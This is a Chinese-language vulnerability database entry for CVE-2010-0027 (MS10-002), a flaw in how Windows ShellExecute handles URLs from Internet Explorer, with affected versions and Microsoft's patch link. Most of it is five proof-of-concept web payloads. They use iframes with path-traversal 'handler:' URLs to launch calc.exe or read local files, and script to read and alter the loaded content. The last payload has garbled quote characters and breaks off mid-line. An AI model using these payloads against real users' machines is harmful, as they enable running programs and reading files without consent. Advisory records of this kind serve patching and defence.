Microsoft Windows ShellExecute()输入验证漏洞(MS10-002/MS10-007)

2010-02-20T00:00:00
ID SSV:19146
Type seebug
Reporter Root
Modified 2010-02-20T00:00:00

Description

BUGTRAQ ID: 37884 CVE ID: CVE-2010-0027

Microsoft Windows是微软发布的非常流行的操作系统。

IE浏览器等应用使用ShellExecute API函数处理文件。由于没有正确的对数据流执行验证,用户受骗跟随了恶意URL就可能导致绕过安全过滤执行本地系统上的二进制程序。

Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Server 2003 SP2 Microsoft Windows 2000SP4 厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS10-002)以及相应补丁: MS10-002:Cumulative Security Update for Internet Explorer (978207) 链接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true

                                        
                                            
                                                ############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################

############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>

############# EOF #################

############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########


############# PoC four ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);

content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>

</body>
</html>

##################### EOF #############################


########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(??GET??,
??handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms??,
true);
req.send(?